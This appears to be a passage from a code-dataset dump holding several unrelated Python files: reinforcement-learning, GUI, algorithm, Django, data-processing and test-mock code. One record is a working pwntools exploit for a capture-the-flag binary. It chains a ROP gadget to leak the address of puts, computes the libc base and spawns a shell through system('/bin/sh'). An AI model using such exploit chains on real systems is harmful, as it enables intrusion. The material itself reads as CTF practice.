predicted_q_values[np.arange(self.batch_size), action]\n        with torch.no_grad():\n            next_q_values, _ = self.target_network(next_state.unsqueeze(dim=1))  # N * A\n            next_best_q_values = torch.max(next_q_values.detach(), dim=1)[0]\n        target_q_values = reward + (self.gamma * (next_best_q_values * (1 - done)))\n        q_loss = self.loss_function(predicted_q_values, target_q_values)\n        state_loss = self.loss_function_state(next_state_pred, next_state)\n        total_loss = q_loss + state_loss\n        self.optimizer.zero_grad()\n        total_loss.backward()\n        for param in self.network.parameters():\n            param.grad.data.clamp_(-1, 1)\n        self.optimizer.step()\n        self.loss_per_episode[\"Q-value loss\"][episode].append(q_loss.item())\n        self.loss_per_episode[\"State loss\"][episode].append(state_loss.item())\n        self.iterations += 1\n\n    def update_episilon(self):\n        if self.epsilon > 0.5:\n            self.epsilon -= 0.03\n        print(f\"Epsilon updated to: {self.epsilon}\")\n\n    def load_model(self):\n        self.network = torch.load(self.save_dir / \"checkpoint.pth\", map_location=self.device)\n        print(\"Trained model loaded\")\n\n    def save_model(self):\n        torch.save(self.network, self.save_dir / \"checkpoint.pth\")\n        print(\"Model saved\")\n\n    def print_episode_loss(self, episode, steps, sum_of_rewards):\n        print(\"-\" * 50)\n        print(f\"Statistics for episode {episode}\")\n        for loss_name in self.loss_names:\n            print(f\"Average {loss_name} for last episode was: {np.mean(self.loss_per_episode[loss_name][episode])}\")\n        print(f\"Duration of episode: {steps}\")\n        print(f\"Sum of rewards: {sum_of_rewards}\")\n        print(\"\")\n\n\n\n\n\n\n\n","sub_path":"Agents/dqn_agent.py","file_name":"dqn_agent.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
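update_model in the agent above forms the standard one-step TD target r + γ·max_a′ Q_target(s′, a′), zeroing the bootstrap term on terminal transitions via the (1 - done) mask. A tiny standalone illustration of just that arithmetic (plain tensors; not part of the agent's code):

import torch

gamma = 0.999
reward = torch.tensor([1.0, 0.0])
next_best_q = torch.tensor([5.0, 7.0])  # max over actions of the target network's Q(s', .)
done = torch.tensor([0.0, 1.0])         # the second transition ends its episode

# Terminal transitions contribute no bootstrapped future value.
target = reward + gamma * next_best_q * (1 - done)
print(target)  # tensor([5.9950, 0.0000])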
+{"seq_id":"327794303","text":"from addBook import *\nfrom deleteBook import *\nfrom issueBook import *\nfrom returnBook import *\nfrom viewBook import *\nimport csv\nfrom datetime import datetime\nimport tkinter\nimport tkinter.messagebox\n\ntoday = datetime.today()\nattendance_csv = '/Users/naukadhabalia/git/library-management/face-recognition/Attendance'+today.strftime(\"%m_%d_%y\")+'.csv'\n# attendance_csv = '/Users/naukadhabalia/git/library-management/face-recognition/Attendance08_20_21.csv'\n\nclass drawBookModule:\n    def __init__(self):\n        window = Tk()\n        window.title(\"Library Management System - Dashboard\")\n        window.minsize(width=400, height=400)\n        window.geometry(\"600x500\")\n\n        headingFrame1 = Frame(window, bg=\"green\", bd=5)\n        headingFrame1.place(relx=0.2, rely=0.1, relwidth=0.6, relheight=0.16)\n\n        headingFrame2 = Frame(headingFrame1, bg=\"#EAF0F1\")\n        headingFrame2.place(relx=0.01, rely=0.05, relwidth=0.98, relheight=0.9)\n\n        headingLabel = Label(headingFrame2, text=\"Welcome, User!\", fg='black')\n        headingLabel.place(relx=0.02, rely=0.2, relwidth=0.96, relheight=0.5)\n\n        addbtn = Button(window, text=\"Add New Book\", command=addBooks, bg=\"#455A64\", fg=\"blue\")\n        addbtn.place(relx=0.35, rely=0.30, relwidth=0.30, relheight=0.08)\n\n        deletebtn = Button(window, text=\"Delete a Book\", command=deleteBooks, bg=\"#455A64\", fg=\"blue\")\n        deletebtn.place(relx=0.35, rely=0.40, relwidth=0.30, relheight=0.08)\n\n        issuebtn = Button(window, text=\"Issue a Book\", command=issueBooks, bg=\"#455A64\", fg=\"blue\")\n        issuebtn.place(relx=0.35, rely=0.50, relwidth=0.30, relheight=0.08)\n\n        returnbtn = Button(window, text=\"Return Book\", command=returnBooks, bg=\"#455A64\", fg=\"blue\")\n        returnbtn.place(relx=0.35, rely=0.60, relwidth=0.30, relheight=0.08)\n\n        viewbtn = Button(window, text=\"List of Books\", command=viewBooks, bg=\"#455A64\", fg=\"blue\")\n        viewbtn.place(relx=0.35, rely=0.70, relwidth=0.30, relheight=0.08)\n\n        viewbtn = Button(window, text=\"View Student entry Logs\", command=read_csv, bg=\"#455A64\", fg=\"blue\")\n        viewbtn.place(relx=0.35, rely=0.80, relwidth=0.30, relheight=0.08)\n\n        greet = Label(window, font=('arial', 13, 'bold'), text=\"Thank you\")\n        #greet.place(relx=0.35, rely=0.90, relwidth=0.30, relheight=0.08)\n\n        window.mainloop()\n\n\ndef read_csv():\n    try:\n        with open(attendance_csv, 'r') as file:\n            reader = csv.reader(file)\n            entry_logs = ''\n            for row in reader:\n                print(row)\n                if(len(row) == 2):\n                    entry_logs = entry_logs +\"Name - \"+ row[0]+\" Time - \"+row[1] + \"\\n\"\n            print(entry_logs)\n            messagebox.showinfo(\"Entry Logs : \"+today.strftime(\"%m/%d/%y\"),entry_logs)\n    except Exception as e :\n        messagebox.showerror('Error', e)\n\ndef manageBookOperations():\n    obj = drawBookModule()\n","sub_path":"student/bookHome.py","file_name":"bookHome.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"163620377","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom Interface import saisirMatrice, genereMatriceAleatoire, afficheChemin\r\nfrom Fichier import chargeMatriceDeCarte\r\nfrom Algo import dijkstra\r\n\r\n\r\ndef meilleurCheminDijkstra():\r\n    print('What would you like to do?\\n','1- Enter a custom matrix.')\r\n    print(' 2- Generate a random matrix.\\n','3- Load a topographic map')\r\n\r\n    choix = int(input('>'))\r\n    \r\n    if (choix == 1):\r\n        matrice = saisirMatrice()\r\n    elif (choix == 2):\r\n        nbSommets = input('Enter the number of vertices: ')\r\n        matrice = genereMatriceAleatoire(nbSommets)\r\n    elif (choix == 3):\r\n        nomFichier = input('Enter the name of the file to open: ')\r\n        matrice = chargeMatriceDeCarte(nomFichier)\r\n    else:\r\n        print('Invalid choice.')\r\n        return\r\n    \r\n    depart = int(input('Enter the start node: '))\r\n    arrive = int(input('Enter the destination node: '))\r\n\r\n    [distance, predecesseurs] = dijkstra(matrice, depart, arrive)\r\n    print('The minimal distance is ', distance)\r\n    afficheChemin(predecesseurs, depart, arrive)\r\n    \r\n\r\nif __name__ == '__main__':\r\n    meilleurCheminDijkstra()\r\n","sub_path":"Principale.py","file_name":"Principale.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
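Principale.py above only wires user input into dijkstra(matrice, depart, arrive), which returns a [distance, predecessors] pair. A self-contained sketch of that calling convention follows; this is not the project's Algo.dijkstra (that module is not in this record), and the adjacency-matrix layout with float('inf') marking "no edge" is an assumption made for illustration:

import heapq

def dijkstra(matrix, start, end):
    # matrix[i][j]: edge weight, or float('inf') when there is no edge (assumed convention)
    n = len(matrix)
    dist = [float('inf')] * n
    pred = [None] * n
    dist[start] = 0
    heap = [(0, start)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist[u]:
            continue  # stale heap entry
        for v, w in enumerate(matrix[u]):
            if w != float('inf') and d + w < dist[v]:
                dist[v] = d + w
                pred[v] = u
                heapq.heappush(heap, (dist[v], v))
    return [dist[end], pred]

INF = float('inf')
matrix = [[INF, 4, 1],
          [4, INF, 2],
          [1, 2, INF]]
distance, predecessors = dijkstra(matrix, 0, 1)
print(distance)      # 3: the path 0 -> 2 -> 1 beats the direct edge of weight 4
print(predecessors)  # [None, 2, 0]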
+{"seq_id":"65465149","text":"#!/usr/bin/python\nfrom pwn import *\n#opens up in a new tmux window\ncontext(terminal=['tmux' , 'new-window'])\n# becomes handy once you are stuck\n#p=gdb.debug('./bitterman' , 'b main')\n#Linux info for pwntools\ncontext(os=\"Linux\" , arch=\"amd64\")\n#opens up the binary\np=process('./bitterman')\n# objdump -D bitterman | grep main , puts \nmain = p64(0x4006ec)\nputs_plt=p64(0x400520)\nputs_got=p64(0x600c50)\n #R2 BITTERMAN; /R rdi\n # 0x00400853      5f             pop rdi \n # 0x00400854      c3             ret \npop_rdi=p64(0x400853)\n#gdb bitterman pattern create 1000 ; pattern offset at the value of sigev\njunk=\"A\"*152\n#skeleton payload to leak the puts address in glibc\npayload=junk+pop_rdi+puts_got+puts_plt+main\n# some pwntools magic to send the payload ;)\np.recvuntil(\"name?\")\np.sendline(\"pu\")\np.recvuntil(\"message:\")\np.sendline(\"1000\")\np.recvuntil(\"text:\")\np.sendline(payload)\np.recvuntil(\"Thanks!\")\nleak = p.recv()[:8].strip().ljust(8, '\\x00')\nlog.success(\"Leaked Address (Puts) : \"+ str(leak))\nleak = u64(leak)#unpack the leak address\n\n#leak = struct.unpack('Q', leak)[0] ; handy if the u64 above doesn't work \n# the hard part: the strategy is to take the leaked runtime address of puts and subtract the static offset of puts inside libc; that difference is the randomized libc base. ASLR picks a new base on every run, and base + the static offsets of system and /bin/sh gives their actual runtime addresses ;) \nput_libc = 0x74040\nsystem_libc = 0x46ff0\nbinsh = 0x183cee\n\noffset = leak - put_libc\nsys = p64(offset + system_libc)\nsh = p64(offset + binsh)\npayload = junk + pop_rdi + sh + sys\n#p.recvuntil(\"name?\")\np.sendline(\"pu\")\np.recvuntil(\"message:\")\np.sendline(\"1000\")\np.recvuntil(\"text:\")\np.sendline(payload)\np.recvuntil(\"Thanks!\")\np.interactive()\n","sub_path":"bitterman-Campctf2015-manual.py","file_name":"bitterman-Campctf2015-manual.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
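The comment in the exploit above boils down to one subtraction (to de-randomize) and two additions (to re-target). Here is that arithmetic worked through with the script's own 0x... constants and a purely hypothetical leak value, since the real leak changes on every run:

put_libc = 0x74040      # static offset of puts inside this libc build
system_libc = 0x46ff0   # static offset of system
binsh = 0x183cee        # static offset of the "/bin/sh" string

leak = 0x7f1234574040   # hypothetical runtime address of puts printed by stage one

libc_base = leak - put_libc             # 0x7f1234500000: randomized base chosen by ASLR
system_addr = libc_base + system_libc   # 0x7f1234546ff0
binsh_addr = libc_base + binsh          # 0x7f1234683cee
print(hex(libc_base), hex(system_addr), hex(binsh_addr))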
+{"seq_id":"156797273","text":"from django.conf.urls import url\nfrom django.contrib.auth.decorators import login_required\nfrom webadmin import views\n\n\nurlpatterns = [\n    # Visits\n    url(r'^$', views.index, name='index'),\n    url(r'^visits/$', views.visit_list, name='visit_list'),\n    url(r'^visit/(?P<pk>[0-9]+)/$', views.visit_detail, name='visit_detail'),\n\n    # Visitors\n    url(r'^visitors/$', views.visitor_list, name='visitor_list'),\n    url(r'^visitors/(?P<pk>[0-9]+)/$', views.visitor_details, name='visitor_details'),\n    url(r'^visitors/(?P<pk>[0-9]+)/edit$', login_required(views.VisitorUpdate.as_view()), name='update_visitor'),\n    url(r'^visitors/create/$', login_required(views.VisitorCreate.as_view()), name='create_visitor'),\n\n    url(r'^contact/$', views.contact, name='contact')\n]\n","sub_path":"Ringo/webadmin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"343070015","text":"#!/bin/python3\n\nimport sys\n\n\nt = int(input().strip())\nfor a0 in range(t):\n    b,w = input().strip().split(' ')\n    b,w = [int(b),int(w)]\n    x,y,z = input().strip().split(' ')\n    x,y,z = [int(x),int(y),int(z)]\n    \n    if x + z < y:\n        # buy only black gifts\n        print((b+w)*x + w*z)\n    elif y + z < x:\n        print((b+w)*y + b*z)\n    else :\n        print(b*x + w*y)\n\n\n","sub_path":"Competitive Programming/hackerrank/Algorithm/Implementation/taum_and_bday.py","file_name":"taum_and_bday.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"643704621","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: longshuicui\n@date : 2021/4/23\n@function:\n303. Range Sum Query - Immutable (Easy)\nhttps://leetcode-cn.com/problems/range-sum-query-immutable/\nGiven an integer array nums, compute the sum of the elements from index i to j (i <= j), inclusive of both endpoints.\n\nImplement the NumArray class:\n\nNumArray(int[] nums) initializes the object with the array nums\nint sumRange(int i, int j) returns the sum of the elements of nums from index i to j (i <= j), inclusive (that is, sum(nums[i], nums[i + 1], ... , nums[j]))\n\"\"\"\n\nclass NumArray:\n    \"\"\"Sum by iterating over the range; time complexity O(n).\"\"\"\n    def __init__(self, nums):\n        self.arrays=nums\n\n    def sumRange(self, left, right):\n        res=0\n        for i in range(left, right+1):\n            res+=self.arrays[i]\n        return res\n\nclass NumArrayAdvance:\n    \"\"\"sum[j]-sum[i-1] is exactly the sum over [i, j], so each query is O(1).\n    Stores the prefix sum up to each position (including the current index).\n    \"\"\"\n    def __init__(self, nums):\n        self.sum=[0]\n        for num in nums:\n            self.sum.append(num+self.sum[-1])\n\n    def sumRange(self, left, right):\n        res=self.sum[right+1]-self.sum[left-1+1]\n        return res\n\n\nnums=[-2, 0, 3, -5, 2, -1]\nobj=NumArrayAdvance(nums)\nres=obj.sumRange(0,5)\nprint(res)","sub_path":"06.动态规划/前缀问题/303. 区域和检索 - 数组不可变(Easy).py","file_name":"303. 区域和检索 - 数组不可变(Easy).py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
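NumArrayAdvance above rests on the identity sum(i..j) = prefix[j+1] - prefix[i], where prefix[k] is the sum of the first k elements. The same computation worked through by hand for the record's sample array (standalone; it mirrors the record's logic rather than importing it):

nums = [-2, 0, 3, -5, 2, -1]

prefix = [0]
for n in nums:
    prefix.append(prefix[-1] + n)
# prefix == [0, -2, -2, 1, -4, -2, -3]

# sumRange(2, 5) = 3 + (-5) + 2 + (-1) = -1
assert prefix[5 + 1] - prefix[2] == -1
# sumRange(0, 2) = -2 + 0 + 3 = 1
assert prefix[2 + 1] - prefix[0] == 1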
+{"seq_id":"379485066","text":"import logging\nimport tempfile\n\nfrom core_lib.data_layers.data_access.data_access import DataAccess\nfrom core_lib.data_layers.data.session.object_data_session_factory import ObjectDataSessionFactory\n\n\nclass ObjectsDataAccess(DataAccess):\n\n    def __init__(self, data_session_factory: ObjectDataSessionFactory):\n        DataAccess.__init__(self, data_session_factory)\n        self.logger = logging.getLogger(self.__class__.__name__)\n\n    def get_object(self, bucket_name: str, object_name: str):\n        with tempfile.TemporaryFile() as tmp_file:\n            with self.get_session() as s3:\n                s3.download_fileobj(bucket_name, object_name, tmp_file)\n                tmp_file.seek(0)  # rewind before reading back what boto3 just wrote\n                file_content = tmp_file.read()\n        return file_content\n\n    def set_object(self, bucket_name: str, value):\n        with tempfile.NamedTemporaryFile() as tmp_file:\n            tmp_file.write(value.encode())\n            tmp_file.flush()  # ensure bytes hit disk before upload_file reads the path\n            with self.get_session() as session:\n                session.upload_file(tmp_file.name, bucket_name, value)\n","sub_path":"examples/objects_core_lib/core_lib/data_layers/data_access/objects_data_access.py","file_name":"objects_data_access.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"621413985","text":"# This program is the first step of transforming the original CLPsych dataset\n# into the form that we need to start creating post-reply sets\n\nimport os\nimport re\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\n\nloginsList = []\nloginsFile = open('logins.txt', 'w')\npostsList = []\npostsFile = open('posts.txt', 'w')\n\n# normalize and clean up tokens that could be usernames\ndef parseUsername(input):\n    inputLower = input.lower()\n    inputLowerClean = re.sub(r'[^a-z]', '', inputLower)\n    # handle a few edge cases where usernames have no letters\n    if inputLowerClean == '':\n        inputLowerClean = input\n    return inputLowerClean\n\n# create a list of all the moderator ID numbers to reference later when we filter\nranks = open('author_rankings.tsv', 'r').readlines()\nmodsList = []\nfor line in ranks:\n    lineTokens = line.split('\\t')\n    if 'Mod' in lineTokens[1] or 'Crew' in lineTokens[1] or 'Staff' in lineTokens[1]:\n        modsList.append(lineTokens[0])\n\n# create a list of all simplified usernames to check against as we extract usernames from text\nfor dirName, subdirList, fileList in os.walk('posts'):\n    for fname in fileList:\n        tree = ET.parse('posts/' + fname)\n        response = tree.getroot()\n        if response.get('status') == 'error':\n            continue\n        message = response[0]\n        login = message.find('author')[0].text\n        # deal crudely with the case of login names that include spaces...\n        # looking at the list of names, it appears that this won't produce duplicates\n        simplifiedLogin = parseUsername(login.split()[0])\n        if simplifiedLogin not in loginsList:\n            loginsList.append(simplifiedLogin)\nloginsList.sort()\nfor line in loginsList:\n    loginsFile.write(line + '\\n')\nloginsFile.close()\n\n# process all the individual post XML files and create a single text file\n# in the format that will be easier for us to process in the next step\nfor dirName, subdirList, fileList in os.walk('posts'):\n    for fname in fileList:\n        tree = ET.parse('posts/' + fname)\n        response = tree.getroot()\n        if response.get('status') == 'error':\n            continue\n        message = response[0]\n        id = message.find('id').text\n        if id is None:\n            continue\n        time = message.find('post_time').text\n        authorID = message.find('author').get('href')[10:]\n        if authorID in modsList:\n            modBoolean = 'T'\n        else:\n            modBoolean = 'F'\n        thread = message.find('thread').get('href')\n        if thread == '/threads/id/1810':\n            negToPosBoolean = 'T'\n        else:\n            negToPosBoolean = 'F'\n        login = message.find('author')[0].text\n        simplifiedLogin = parseUsername(login.split()[0])\n        rawBody = message.find('body').text\n\n        # handle some posts in the dataset that are inexplicably blank\n        if rawBody is None:\n            continue\n\n        # extract usernames from the post body\n        htmlRemovedBody = BeautifulSoup(rawBody).text\n        quotedUsers = ' '\n        htmlRemovedBodyTokens = htmlRemovedBody.split()\n        lastToken = ''\n        for token in htmlRemovedBodyTokens:\n            if lastToken == 'Hi' or lastToken == 'hi' or lastToken == 'Hello' or lastToken == 'hello' or lastToken == 'Hey' or lastToken == 'hey':\n                if parseUsername(token) in loginsList:\n                    quotedUsers = quotedUsers + parseUsername(token) + ' '\n                lastToken = token\n                continue\n            if token.startswith('wrote:'):\n                if parseUsername(lastToken) in loginsList:\n                    quotedUsers = quotedUsers + parseUsername(lastToken) + ' '\n                lastToken = token\n                continue\n            if token.startswith('@'):\n                if parseUsername(token) in loginsList:\n                    quotedUsers = quotedUsers + parseUsername(token) + ' '\n                lastToken = token\n                continue\n            lastToken = token\n\n        # clean up post body text: drop quoted text, then strip remaining markup\n        quotesRemovedBody = re.sub(r\"<blockquote>(.*?)</blockquote>\", '', rawBody, 0, re.S)\n        htmlRemovedQuotesRemovedBody = BeautifulSoup(quotesRemovedBody).text\n        htmlRemovedQuotesRemovedBodyTokens = htmlRemovedQuotesRemovedBody.split()\n        finalTextBody = ' '.join(htmlRemovedQuotesRemovedBodyTokens)\n\n        # put it all together\n        postString = time + '\\t' + id + '\\t' + simplifiedLogin + '\\t[' + quotedUsers + ']\\t' + finalTextBody + '\\t' + modBoolean + '\\t' + login + '\\t' + negToPosBoolean\n        postsList.append(postString)\n\npostsList.sort()\nfor line in postsList:\n    postsFile.write(line + '\\n')\npostsFile.close()\n","sub_path":"combinePosts.py","file_name":"combinePosts.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"31767438","text":"from typing import List\n\nclass Solution:\n\n    def find_single_num_by_bit(self, nums: List[int]) -> int:\n        bitwise_count = 0\n        for i in range(32):\n            cur_bit = 0\n            for j in range(len(nums)):\n                cur_bit += (abs(nums[j]) >> i) & 1\n            bitwise_count |= (cur_bit % 3) << i\n        if nums.count(bitwise_count) == 1:\n            return bitwise_count\n        else:\n            return -bitwise_count\n\n    def singleNumber(self, nums: List[int]) -> int:\n        return self.find_single_num_by_bit(nums)\n\narr = [0,1,0,1,0,1,99]\nprint(Solution().singleNumber(arr))\n\n","sub_path":"leetcode/2nd_Round/137.py","file_name":"137.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
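find_single_num_by_bit above counts, per bit position, how many of the numbers have that bit set; every element that appears exactly three times contributes a multiple of 3, so count % 3 isolates the bits of the unique element (negatives are handled separately in the record via abs and the final sign fix-up). The counting spelled out for the record's own sample input, for non-negative values:

nums = [0, 1, 0, 1, 0, 1, 99]   # 99 == 0b1100011

# Bit 0: set in each of the three 1s and in 99 -> count = 4, and 4 % 3 == 1,
# so bit 0 belongs to the unique element.
count_bit0 = sum((n >> 0) & 1 for n in nums)
assert count_bit0 % 3 == 1

# Bit 1: set only in 99 -> count = 1, which also survives the mod.
count_bit1 = sum((n >> 1) & 1 for n in nums)
assert count_bit1 % 3 == 1

# Reassembling every surviving bit reproduces 99.
result = 0
for i in range(32):
    result |= (sum((n >> i) & 1 for n in nums) % 3) << i
assert result == 99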
+{"seq_id":"297728301","text":"import json\n\n# import api keys\nwith open('./sensitive.json') as data_file: \n    sensitive = json.load(data_file)\n    azure_key = sensitive['AZURE_KEY']\n\ndef get_tags(request_body):\n    print('adding photo...')\n    import httplib, urllib, base64\n\n    headers = {\n        # Request headers\n        'Content-Type': 'application/json',\n        'Ocp-Apim-Subscription-Key': azure_key\n    }\n\n    params = urllib.urlencode({\n        # Request parameters\n        'visualFeatures': 'Categories,Description,Color',\n        'language': 'en',\n    })\n\n    try:\n        conn = httplib.HTTPSConnection('westus.api.cognitive.microsoft.com')\n        conn.request(\"POST\", \"/vision/v1.0/analyze?%s\" % params, request_body, headers)\n        response = conn.getresponse()\n        data = response.read()\n        conn.close()\n    except Exception as e:\n        print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))\n\n    stringified_data = json.loads(data)\n    print('result is: ', stringified_data['description']['tags'])\n    return stringified_data['description']['tags']\n","sub_path":"flask_server/app/azure_get_tags.py","file_name":"azure_get_tags.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"641630716","text":"from django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom classes.models import GymClass\n\n\ndef cart_contents(request):\n\n    cart_items = []\n    total = 0\n    product_count = 0\n    item_total = 0\n\n    cart = request.session.get('cart', {})\n\n    for item_id, item_data in cart.items():\n        if isinstance(item_data, int):\n            gym_class = get_object_or_404(GymClass, pk=item_id)\n            total += item_data * gym_class.price\n            product_count += item_data\n            item_total += product_count * gym_class.price\n            cart_items.append({\n                'item_id': item_id,\n                'quantity': item_data,\n                'item_total': item_total,\n                'gym_class': gym_class,\n            })\n        else:\n            gym_class = get_object_or_404(GymClass, pk=item_id)\n            quantity = item_data['quantity']  # non-int entries are assumed to be dicts carrying a 'quantity' key\n            total += quantity * gym_class.price\n            product_count += quantity\n            item_total += product_count * gym_class.price\n            cart_items.append({\n                'item_id': item_id,\n                'quantity': quantity,\n                'item_total': item_total,\n                'gym_class': gym_class,\n            })\n\n    context = {\n        'cart_items': cart_items,\n        'total': total,\n        'product_count': product_count,\n    }\n\n    return context\n","sub_path":"cart/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"175970808","text":"#pylint: disable=line-too-long,too-many-public-methods,invalid-name\n#pylint: disable=missing-docstring,protected-access,too-few-public-methods\n#pylint: disable=too-many-arguments,too-many-instance-attributes\nfrom __future__ import print_function, absolute_import, division\n\nfrom collections import OrderedDict\nimport os\nimport re\nimport sys\nimport unittest\n\nfrom testfixtures import TempDirectory\n\nimport jacquard.utils.utils as utils\nfrom jacquard.utils.vcf import VcfRecord, VcfReader, FileWriter, FileReader\nimport test.utils.test_case as test_case\n\n\ntry:\n    from StringIO import StringIO\nexcept ImportError:\n    from io import StringIO\n\n\nclass MockFileWriter(object):\n    def __init__(self):\n        self._content = []\n        self.opened = False\n        self.closed = False\n\n    def open(self):\n        self.opened = True\n\n    def write(self, content):\n        if content is None:\n            return\n        self._content.extend(content.splitlines())\n\n    def lines(self):\n        return self._content\n\n    def close(self):\n        self.closed = True\n\n\nclass MockFileReader(object):\n    def __init__(self, input_filepath=\"/foo/mockFileReader.txt\", content=None):\n        self.input_filepath = input_filepath\n        self.file_name = os.path.basename(input_filepath)\n        if content is None:\n            self.content = []\n        else:\n            self.content = content\n        self.open_was_called = False\n        self.close_was_called = False\n        self.lines_to_iterate = None\n\n    def open(self):\n        self.open_was_called = True\n        self.lines_to_iterate = list(self.content)\n\n    def read_lines(self):\n        for line in self.lines_to_iterate:\n            yield line\n\n    def close(self):\n        self.close_was_called = True\n        self.lines_to_iterate 
= None\n\n def __lt__(self, other):\n return self.file_name < other.file_name\n\nclass MockWriter(object):\n def __init__(self, output_filepath=None):\n self._content = []\n if output_filepath:\n self.output_filepath = output_filepath\n else:\n self.output_filepath = \"foo\"\n self.opened = False\n self.closed = False\n\n def open(self):\n self.opened = True\n\n def write(self, content):\n self._content.extend(content.splitlines())\n\n def lines(self):\n return self._content\n\n def close(self):\n self.closed = True\n\nclass MockVcfReader(object):\n def __init__(self,\n input_filepath=\"vcfName\",\n metaheaders=None,\n column_header='#CHROM\\tPOS\\tID\\tREF\\tALT\\tQUAL\\tFILTER\\tINFO\\tFORMAT\\tNORMAL\\tTUMOR',\n content=None,\n records=None,\n sample_names=None):\n\n if content is None:\n self.content = [\"foo\"]\n else:\n self.content = content\n\n if metaheaders is None:\n self.metaheaders = [\"##metaheaders\"]\n else:\n self.metaheaders = metaheaders\n\n if records:\n self.records = records\n elif content:\n self.records = [MockVcfRecord.parse_record(line) for line in self.content]\n else:\n self.records = []\n\n if sample_names is None:\n self.sample_names = []\n else:\n self.sample_names = sample_names\n self.file_name = input_filepath\n self.input_filepath = input_filepath\n self.column_header = column_header\n self.split_column_header = self.column_header.strip(\"#\").split(\"\\t\")\n self.opened = False\n self.closed = False\n self._caller_name = \"mockCaller\"\n self.qualified_sample_names = self._create_qualified_sample_names()\n self.format_tags={}\n\n def open(self):\n self.opened = True\n #pylint:disable=unused-argument\n def vcf_records(self, dummy=None, qualified=False):\n for record in self.records:\n yield record\n\n def tagged_vcf_records(self):\n for record in self.records:\n yield record\n\n def _get_tag_metaheaders(self, regex_exp):\n tag_dict = {}\n for metaheader in self.metaheaders:\n tag = re.match(regex_exp, metaheader)\n if tag:\n tag_key = tag.group(1)\n tag_dict[tag_key] = metaheader.strip()\n\n return tag_dict\n\n @property\n def format_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##FORMAT=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def info_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##INFO=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def filter_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##FILTER=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def contig_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##contig=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def non_format_metaheaders(self):\n return self.metaheaders\n\n def _create_qualified_sample_names(self):\n patient_prefix = self.file_name.split(\".\")[0]\n qualified_names = []\n if self.sample_names:\n for sample_name in self.sample_names:\n qualified_names.append(\"|\".join([patient_prefix, sample_name]))\n else:\n qualified_names.append(\"|\".join([\"foo\", \"bar\"]))\n return qualified_names\n\n def modify_metaheader(self, original_metaheader, transformed_tag):\n pass\n\n def store_format_tags(self, original_tag, new_tag):\n self.format_tags[original_tag] = new_tag\n\n @property\n def caller_name(self):\n return self._caller_name\n\n def close(self):\n self.closed = True\n\n\nclass MockCaller(object):\n def __init__(self, name=\"MockCaller\", metaheaders=None, claimable=None):\n if claimable:\n self.claimable = claimable\n else:\n self.claimable = set()\n self.name = name\n if metaheaders:\n self.metaheaders = metaheaders\n else:\n self.metaheaders = 
[\"##mockMetaheader1\"]\n self.file_name_search = \"snps|indels\"\n\n @staticmethod\n def add_tags(vcfRecord):\n return vcfRecord\n\n @staticmethod\n def decorate_files(filenames, dummy):\n return filenames[0]+\"foo\"\n\n def get_new_metaheaders(self):\n return self.metaheaders\n\n def claim(self, file_readers):\n unclaimed = list(set(file_readers).difference(self.claimable))\n claimed = list(set(file_readers).intersection(self.claimable))\n return unclaimed, claimed\n\nclass MockVcfRecord(object):\n @classmethod\n def parse_record(cls, vcf_line):\n vcf_fields = vcf_line.rstrip().split(\"\\t\")\n chrom, pos, rid, ref, alt, qual, rfilter, info, rformat \\\n = vcf_fields[0:9]\n samples = vcf_fields[9:]\n return MockVcfRecord(chrom, pos, ref, alt, rid, qual, rfilter, info,\n rformat, samples)\n\n def __init__(self, chrom, pos, ref, alt,\n vcf_id=\".\", qual=\".\", vcf_filter=\".\", info=\".\", vcf_format=\".\",\n samples=None):\n self.chrom = chrom\n self.pos = pos\n self.id = vcf_id\n self.ref = ref\n self.alt = alt\n self.qual = qual\n self.filter = vcf_filter\n self.info = info\n self.info_dict = self._init_info_dict()\n self.format = vcf_format\n if samples is None:\n self.samples = []\n else:\n self.samples = samples\n\n tags = self.format.split(\":\")\n self.format_set = tags\n\n self.sample_tag_values = {}\n for i, sample in enumerate(self.samples):\n values = sample.split(\":\")\n self.sample_tag_values[i] = OrderedDict(zip(tags, values))\n\n def get_empty_record(self):\n return MockVcfRecord(self.chrom, self.pos, self.ref, self.alt)\n\n def _init_info_dict(self):\n info_dict = {}\n\n for key_value in self.info.split(\";\"):\n if \"=\" in key_value:\n key, value = key_value.split(\"=\")\n info_dict[key] = value\n else:\n info_dict[key_value] = 